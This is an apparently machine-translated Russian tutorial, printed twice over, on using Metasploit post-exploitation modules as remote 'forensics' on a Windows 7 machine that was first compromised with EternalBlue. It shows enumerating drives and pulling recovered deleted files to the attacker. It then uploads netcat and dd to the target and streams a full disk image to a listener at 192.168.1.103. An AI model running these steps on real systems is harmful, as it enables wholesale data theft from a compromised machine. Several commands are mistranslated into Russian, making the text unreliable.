Добро пожаловать обратно, мои кибервоины Metasploit!
Хотя Metasploit — это «эксплуатационная платформа», используемая в основном для взлома и тестирования на проникновение, её также можно использовать для предоставления некоторых элементарных возможностей криминалистической экспертизы. Её основная польза как криминалистического инструмента заключается в сборе доказательств из удалённой системы, когда сама система физически недоступна следователю. В некоторых случаях это может быть единственным способом сбора доказательств, когда физическое местоположение неизвестно или недоступно следователю. Недостаток, конечно же, заключается в том, что она зависит от передачи данных по сети, что делает этот процесс очень длительным и утомительным. Тем не менее, в некоторых обстоятельствах она может быть необходима, например, если злоумышленники — представители государственных структур или другие злоумышленники, находящиеся вне юрисдикции правоохранительных органов.
Модули криминалистики в Metasploit были впервые разработаны Уэсли МакГрю в Национальном учебном центре криминалистики Университета штата Миссисипи. Хотя эти модули были очень эффективны на момент своего создания, многие из них оказались неэффективны из-за несоответствия новым технологиям. Несмотря на это, мы постараемся использовать те, которые работают, и разработать обходные пути для тех, которые не работают.
Шаг №: Запустите Kali
Первый шаг, конечно же, — запустить Kali и открыть терминал. Если перейти в соответствующий каталог в Metasploit Framework, то увидим шесть модулей для анализа Windows (модулей для других операционных систем нет, но мы воспользуемся обходным решением на шаге 4, которое должно работать и в некоторых других операционных системах, в частности, в Linux).
kali > cd /usr/share/metasploit-framework/modules/post/windows/gather/forensics
кали > ls -l
Шаг №2: Перечисление дисков в целевой системе
Чтобы начать процесс криминалистического анализа удалённой системы, нам необходимо её скомпрометировать. Это можно сделать несколькими способами, но в данном случае я использовал эксплойт EternalBlue против системы Windows 7.
Получив приглашение meterpreter, нам нужно перевести meterpreter в фоновый режим и вернуться к приглашению msf.
meterpreter> фон
Обратите внимание, что Metasploit возвращает номер сеанса, который он перевёл в фоновый режим. Этот номер вам скоро понадобится.
В рамках нашего процесса анализа нам необходимо сначала перечислить все устройства хранения данных в системе. Существует модуль постэксплуатации под названием:
post/windows/gather/forensics/enum_drives
Давайте загрузим его.
msf > используйте post/windows/gather/forensics/enum_drives
Теперь мы можем показать параметры, чтобы увидеть, какие переменные и параметры нужно задать. Похоже, нам нужно задать только SESSION.
msf > установить СЕАНС 1
Осталось только запустить команду «exploit» для перечисления устройств хранения данных на удаленной системе.
msf > эксплуатировать
Обратите внимание, что этот модуль идентифицировал два физических диска и три логических диска.
Шаг №3: Восстановление удаленных файлов с целевого устройства
Часто злоумышленники удаляют важные файлы (фотографии, электронные письма, документы и т. д.), пытаясь замести следы своей вредоносной деятельности. Как известно, удалённые файлы на самом деле не исчезают, а просто становятся доступными для перезаписи. Физически файл сохраняется.
Мы можем восстановить эти файлы удаленно из целевой системы с помощью модуля постэксплуатации;
post/windows/gather/forensics/recovery_files
msf > используйте post/windows/gather/forensics/recovery_files
После загрузки давайте посмотрим на его параметры.
msf > показать параметры
Как видите, этот модуль будет работать с настройками по умолчанию, анализируя диск C:. Если вы хотите восстановить удалённые файлы с другого диска, вам необходимо настроить параметр DRIVE соответствующим образом (например, указать DRIVE D
.
Есть один параметр, TIMEOUT, который, как я обнаружил, вам, возможно, захочется сбросить. Значение по умолчанию — 3600 секунд или один час. В моём случае я увеличил это время вдвое до двух часов или 7200 секунд (необходимое время зависит от размера диска. Как уже упоминалось выше, это медленный и утомительный процесс).
msf > установить TIMEOUT 7200
После сброса TIMEOUT просто введите exploit.
msf > эксплуатировать
Metasploit начнёт поиск удалённых файлов на жёстком диске. Как видите выше, он нашёл только один файл с идентификатором 3263873024.
Чтобы восстановить этот удаленный файл, нам нужно установить параметр FILES на этот номер файла и снова воспользоваться уязвимостью.
msf > набор ФАЙЛОВ 3263873024
msf > эксплуатировать
Как видно на скриншоте выше, этот модуль восстановил удалённый файл, перенёс его в вашу систему и сохранил в каталоге /root/.msf4/loot . Там вы можете найти и изучить файл, который злоумышленник считал удалённым и безвозвратно потерянным! В данном случае это может быть ключевая информация или же она может содержать секретную или конфиденциальную информацию.
Шаг №4: Получите криминалистическое изображение целевой системы
В некоторых случаях нам может потребоваться создать криминалистический образ всего диска, аналогичный тому, что мы делаем с помощью FTK Imager или других инструментов для работы с изображениями. Это позволит нам провести полномасштабное криминалистическое исследование с использованием таких программ, как Autopsy, FTK или Encase.
К сожалению, разработанный Уэсли МакГрю инструмент для сканирования изображений больше не поддерживает эту функцию. К счастью, мы в Hackers-Arise разработали обходной путь, позволяющий добиться того же результата.
Используя meterpreter для Windows на целевой системе, мы можем загрузить файлы. В данном случае нам понадобятся два файла для загрузки криминалистического образа диска. Первый — это netcat, а второй — утилита побитового копирования дисков dd . Поскольку это целевая система Windows, нам понадобятся версии обеих утилит для Windows (если целевой системой является Linux, то, скорее всего, обе эти утилиты уже встроены). Версию netcat для Windows можно получить здесь , а версию dd для Windows — здесь.
Теперь загрузите оба этих файла в целевую систему.
meterpreter > загрузить nc.exe
meterpreter > загрузить дд
Затем в Kali или системе злоумышленника откройте прослушиватель Netcat, который распакует (-d) передаваемые данные с помощью bzip и передаст их в dd. Подводя итог, мы открываем прослушиватель в Kali, с которым целевая система может связаться через порт 6996, распакует данные и отправит их в файл с именем «forensicimage».
kali > nc -l 6996 | bzip2 -d | dd bs=16M of=/dev/forensicimage
Теперь в meterpreter на целевой системе Windows перейдите в командную оболочку.
meterpreter > оболочка
Наконец, перейдите в каталог, куда вы загрузили netcat и dd. В моём случае это C:.
Теперь мы можем запустить dd на целевой системе, побитно захватывая изображение, передавая его в bzip2 для сжатия (-c), а затем передавая его через netcat в нашу систему Kali (192.168.1.103) на прослушивающий порт (6996).
C:> dd bs=16M if=/dev/sda | bzip2 -c | nc 192.168.1.103 6996
Будьте осторожны! Это очень медленный и утомительный процесс, который, вероятно, займёт много часов или дней, но если это единственный способ получить доказательства, ожидание, вероятно, стоит того. После завершения процесса вы можете начать криминалистическую экспертизу с использованием вашего любимого пакета программ, например, Autopsy, FTK или Encase.
Заключение
Metasploit — это, прежде всего, фреймворк для эксплуатации уязвимостей, но с годами его возможности постоянно расширялись. Как мы видели в этом руководстве, Metasploit теперь можно использовать для проведения элементарной цифровой криминалистики на удалённой системе, например, для восстановления удалённых файлов и создания криминалистического образа жёсткого диска. Из-за затрачиваемого времени этот процесс имеет смысл только в том случае, если целевая система недоступна для прямого физического анализа.
Хотя Metasploit — это «эксплуатационная платформа», используемая в основном для взлома и тестирования на проникновение, её также можно использовать для предоставления некоторых элементарных возможностей криминалистической экспертизы. Её основная польза как криминалистического инструмента заключается в сборе доказательств из удалённой системы, когда сама система физически недоступна следователю. В некоторых случаях это может быть единственным способом сбора доказательств, когда физическое местоположение неизвестно или недоступно следователю. Недостаток, конечно же, заключается в том, что она зависит от передачи данных по сети, что делает этот процесс очень длительным и утомительным. Тем не менее, в некоторых обстоятельствах она может быть необходима, например, если злоумышленники — представители государственных структур или другие злоумышленники, находящиеся вне юрисдикции правоохранительных органов.
Модули криминалистики в Metasploit были впервые разработаны Уэсли МакГрю в Национальном учебном центре криминалистики Университета штата Миссисипи. Хотя эти модули были очень эффективны на момент своего создания, многие из них оказались неэффективны из-за несоответствия новым технологиям. Несмотря на это, мы постараемся использовать те, которые работают, и разработать обходные пути для тех, которые не работают.
Шаг №: Запустите Kali
Первый шаг, конечно же, — запустить Kali и открыть терминал. Если перейти в соответствующий каталог в Metasploit Framework, то увидим шесть модулей для анализа Windows (модулей для других операционных систем нет, но мы воспользуемся обходным решением на шаге 4, которое должно работать и в некоторых других операционных системах, в частности, в Linux).
kali > cd /usr/share/metasploit-framework/modules/post/windows/gather/forensics
кали > ls -l
Шаг №2: Перечисление дисков в целевой системе
Чтобы начать процесс криминалистического анализа удалённой системы, нам необходимо её скомпрометировать. Это можно сделать несколькими способами, но в данном случае я использовал эксплойт EternalBlue против системы Windows 7.
Получив приглашение meterpreter, нам нужно перевести meterpreter в фоновый режим и вернуться к приглашению msf.
meterpreter> фон
Обратите внимание, что Metasploit возвращает номер сеанса, который он перевёл в фоновый режим. Этот номер вам скоро понадобится.
В рамках нашего процесса анализа нам необходимо сначала перечислить все устройства хранения данных в системе. Существует модуль постэксплуатации под названием:
post/windows/gather/forensics/enum_drives
Давайте загрузим его.
msf > используйте post/windows/gather/forensics/enum_drives
Теперь мы можем показать параметры, чтобы увидеть, какие переменные и параметры нужно задать. Похоже, нам нужно задать только SESSION.
msf > установить СЕАНС 1
Осталось только запустить команду «exploit» для перечисления устройств хранения данных на удаленной системе.
msf > эксплуатировать
Обратите внимание, что этот модуль идентифицировал два физических диска и три логических диска.
Шаг №3: Восстановление удаленных файлов с целевого устройства
Часто злоумышленники удаляют важные файлы (фотографии, электронные письма, документы и т. д.), пытаясь замести следы своей вредоносной деятельности. Как известно, удалённые файлы на самом деле не исчезают, а просто становятся доступными для перезаписи. Физически файл сохраняется.
Мы можем восстановить эти файлы удаленно из целевой системы с помощью модуля постэксплуатации;
post/windows/gather/forensics/recovery_files
msf > используйте post/windows/gather/forensics/recovery_files
После загрузки давайте посмотрим на его параметры.
msf > показать параметры
.Есть один параметр, TIMEOUT, который, как я обнаружил, вам, возможно, захочется сбросить. Значение по умолчанию — 3600 секунд или один час. В моём случае я увеличил это время вдвое до двух часов или 7200 секунд (необходимое время зависит от размера диска. Как уже упоминалось выше, это медленный и утомительный процесс).
msf > установить TIMEOUT 7200
После сброса TIMEOUT просто введите exploit.
msf > эксплуатировать
Metasploit начнёт поиск удалённых файлов на жёстком диске. Как видите выше, он нашёл только один файл с идентификатором 3263873024.
Чтобы восстановить этот удаленный файл, нам нужно установить параметр FILES на этот номер файла и снова воспользоваться уязвимостью.
msf > набор ФАЙЛОВ 3263873024
msf > эксплуатировать
Как видно на скриншоте выше, этот модуль восстановил удалённый файл, перенёс его в вашу систему и сохранил в каталоге /root/.msf4/loot . Там вы можете найти и изучить файл, который злоумышленник считал удалённым и безвозвратно потерянным! В данном случае это может быть ключевая информация или же она может содержать секретную или конфиденциальную информацию.
Шаг №4: Получите криминалистическое изображение целевой системы
В некоторых случаях нам может потребоваться создать криминалистический образ всего диска, аналогичный тому, что мы делаем с помощью FTK Imager или других инструментов для работы с изображениями. Это позволит нам провести полномасштабное криминалистическое исследование с использованием таких программ, как Autopsy, FTK или Encase.
К сожалению, разработанный Уэсли МакГрю инструмент для сканирования изображений больше не поддерживает эту функцию. К счастью, мы в Hackers-Arise разработали обходной путь, позволяющий добиться того же результата.
Используя meterpreter для Windows на целевой системе, мы можем загрузить файлы. В данном случае нам понадобятся два файла для загрузки криминалистического образа диска. Первый — это netcat, а второй — утилита побитового копирования дисков dd . Поскольку это целевая система Windows, нам понадобятся версии обеих утилит для Windows (если целевой системой является Linux, то, скорее всего, обе эти утилиты уже встроены). Версию netcat для Windows можно получить здесь , а версию dd для Windows — здесь.
Теперь загрузите оба этих файла в целевую систему.
meterpreter > загрузить nc.exe
meterpreter > загрузить дд
Затем в Kali или системе злоумышленника откройте прослушиватель Netcat, который распакует (-d) передаваемые данные с помощью bzip и передаст их в dd. Подводя итог, мы открываем прослушиватель в Kali, с которым целевая система может связаться через порт 6996, распакует данные и отправит их в файл с именем «forensicimage».
kali > nc -l 6996 | bzip2 -d | dd bs=16M of=/dev/forensicimage
Теперь в meterpreter на целевой системе Windows перейдите в командную оболочку.
meterpreter > оболочка
Наконец, перейдите в каталог, куда вы загрузили netcat и dd. В моём случае это C:.
Теперь мы можем запустить dd на целевой системе, побитно захватывая изображение, передавая его в bzip2 для сжатия (-c), а затем передавая его через netcat в нашу систему Kali (192.168.1.103) на прослушивающий порт (6996).
C:> dd bs=16M if=/dev/sda | bzip2 -c | nc 192.168.1.103 6996
Будьте осторожны! Это очень медленный и утомительный процесс, который, вероятно, займёт много часов или дней, но если это единственный способ получить доказательства, ожидание, вероятно, стоит того. После завершения процесса вы можете начать криминалистическую экспертизу с использованием вашего любимого пакета программ, например, Autopsy, FTK или Encase.
Заключение
Metasploit — это, прежде всего, фреймворк для эксплуатации уязвимостей, но с годами его возможности постоянно расширялись. Как мы видели в этом руководстве, Metasploit теперь можно использовать для проведения элементарной цифровой криминалистики на удалённой системе, например, для восстановления удалённых файлов и создания криминалистического образа жёсткого диска. Из-за затрачиваемого времени этот процесс имеет смысл только в том случае, если целевая система недоступна для прямого физического анализа.
